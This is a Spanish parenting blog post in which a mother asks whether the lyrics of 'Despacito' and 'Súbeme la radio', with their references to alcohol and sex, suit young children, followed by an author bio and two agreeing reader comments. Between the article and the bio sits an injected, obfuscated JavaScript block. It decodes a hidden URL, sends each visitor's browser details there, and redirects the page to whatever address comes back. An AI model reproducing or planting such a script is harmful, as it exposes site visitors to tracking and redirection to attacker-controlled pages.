¿Sabes lo que escuchan tus hijos?

No sé si os pasará a vosotros también, pero yo me entero de los temas que se van a postular como canción del verano por mis hijas. Ellas se han convertido en importantes influencers en el mundo de la música, en embajadores de un artista o grupo, y es que a través de ellas, he descubierto que estas vacaciones no serán lo mismo sin Despacito o Súbeme la radio. Ambos hits han entrado con fuerza y creo que no conozco a ningún niño de Infantil o de Primaria que no haya bailado en su función de fin de curso al menos uno de estos dos temas, mientras que papá grababa con el móvil la actuación y mamá se emocionaba. Pero, ¿nos hemos parado a analizar la letra de estas canciones? ¿Son adecuadas para su edad? ¿Sabemos realmente lo que escuchan nuestros hijos?

El verano no ha hecho nada más que empezar y ya estamos (o estoy) un poco saturada de escuchar el Despacito, de Luis Fonsi, o el Súbeme la radio, de Enrique Iglesias, pero no desesperemos. Seguro que forma parte de vuestra playlist del verano 2017; seguro que cuando vais en el coche no podéis evitar ponerla a todo volumen cuando el locutor correspondiente la anuncia y, seguro, que es un imprescindible más en cualquier barbacoa de esta temporada para que la fiesta triunfe y no decaiga. “Súbeme la radio, tráeme el alcohol”, canta Enrique Iglesias. ¿Alcohol? ¿Dice alcohol? Sí, dice alcohol.

Quizás no nos habíamos parado hasta ahora a analizar detenidamente la letra o sí lo habíamos hecho, pero no le habíamos dado importancia. Pero lo dice claramente al principio del tema: alcohol. Y este mensaje es el que está llegando a nuestros hijos. Tal vez vuestros peques, como las mías (de seis y dos años), no encuentren un significado, ni bueno ni malo, a esta palabra, pero deberíamos reflexionar sobre si es un contenido adecuado para nuestros hijos.

Nos preocupamos de lo que ponen en la tele, criticamos que programas tipo Sálvame se emitan en la franja infantil, ponemos el grito en el cielo si una gran superfice utiliza niñas para anunciar sus bañadores, pero luego les animamos a que bailen con nosotros el Súbeme la radio. ¿Estamos seguros? Porque la letra de Enrique Iglesias es más o menos moderada si la comparamos con el Despacito. Atentos a las cosas que Luis Fonsi dice en su hit:

“Quiero desnudarte a besos despacito, firmo en las paredes de tu laberinto, y hacer de tu cuerpo todo un manuscrito”, “Quiero sobrepasar tus zonas de peligro, hasta provocar tus gritos, y que olvides tu apellido” o “Vamos a hacerlo en una playa en Puerto Rico, hasta que las olas griten, ay bendito, para que mi sello se quede contigo”. Teniendo en cuenta que mi hija mayor está en una época de descubrir cosas, de preguntarlo todo, de querer saber más, no sé si estaría preparada a explicarle, en el caso de que me pregunte, qué significa, por ejemplo, quiero sobrepasar tus zonas de peligro.

No se trata de poner puertas al campo, porque aunque les impidamos escuchar determinadas canciones, en cualquier chiringuito de playa o en la radio de la piscina municipal van a sonar igualmente, incluso, nuestro compañero de toalla de al lado puede  ponerla en su móvil para que su hijo la escuche. Se trata de que seamos conscientes de los mensajes que pueden llegar a nuestros peques de la forma más inocente y, por tanto, más eficaz, perpetuando determinados esterotipos, como el consuelo del alcohol ante el desamor o las historias románticas basadas en el conquistador sexual. Cosas, que como madre de dos niñas, cada vez tengo más en cuenta.

 
var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

2 comentarios en “¿Sabes lo que escuchan tus hijos?

  1. Totalmente de acuerdo. Soy maestra y mamá y llevo semanas con mi propio debate mental. La verdad… No sé la solución, supongo que intentar crear seres humanos capaces de diferenciar entre un baile y una forma de pensar y actuar ante la vida. ¡¡ QUE DIFICIL¡¡

    1. Buenas tardes,
      la verdad es que me ha encantado leer tu post pq llevaba un mes pensando si llamar al colegio a averiguar pq mis dos pekes vienen cantando canciones que yo desconozco y que no considero que sean aptas para todos los públicos. Es cierto que los niños no tienen que vivir en una burbuja pero que los propios profesores pongan esas canciones en el colegio no lo considero adecuado.
      Y además considero que buscar el punto intermedio es difícil, pero habría que intentarlo

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *